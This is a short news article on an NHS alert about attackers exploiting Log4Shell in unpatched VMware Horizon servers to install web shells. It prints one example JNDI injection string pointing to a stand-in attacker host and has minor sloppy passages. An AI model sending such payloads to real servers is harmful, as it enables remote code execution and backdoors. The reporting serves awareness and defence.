The UK’s National Health Service (NHS) has warned of ongoing attacks on its VMWare Horizon servers
The attacker is actively targeting the Log4Shell vulnerability in the VMware Horizon server in order to establish a web shell.
In a security alert issued by the NHS, it said, “This Log4Shell appears to be being used by attackers to perform a number of malicious activities, including deploying additional malicious software, exfiltrating data, and deploying ransomware.
In December 2021, it was reported that the Conti ransomware exploited Log4Shell to compromise VMWare vCenter servers, and this is the second NHS attack to target VMWare products using a vulnerability in Log4Shell.
What is Log4Shell
Log4Shell, disclosed on December 9, 2021, is a vulnerability in Apache Log4j, a Java library for adding log management capabilities to Java web and desktop applications.
This vulnerability was discovered in late November by the operator of a Minecraft server that used Log4j for log management, and it was discovered that someone had hijacked the server using an exploit of the following form.
${jndi:ldap://attacker.com/malicious_script}
Log4j patches have been released to fix and counter the attack, and VMWare is one of the companies that has integrated Log4j fixes into their products to prevent their software from being easily exploited by the Log4Shell exploit.
VMWare Horizon, a platform for managing and deploying virtual desktops for enterprise staff, was one of a number of VMWare affected products that received patches to prevent Log4Shell attacks.
NHS discovers Log4Shell attack on VMWare Horizon server
However, NHS says it has identified an attack that attempts to identify unpatched VMWare Horizon servers, even though patches have been provided.
According to the NHS security team, this attack follows the pattern of an early Log4Shell exploit (details above), where the attacker sends a JDNI request to the VMWare Horizon server.
If the server is not patched, the attacker’s exploit will cause the Horizon server to connect to the malicious domain via LDAP and download and execute a PowerShell script to install a web shell, which will act as a backdoor for future attacks. This acts as a backdoor for future attacks.
To help organizations running VMWare Horizon servers, the UK NHS has published instructions on how to detect signs of potential abuse.
This advice can be found in the NHS technical report, but is not reproduced here to avoid a situation where the NHS updates its code to have better detection capabilities.
Comments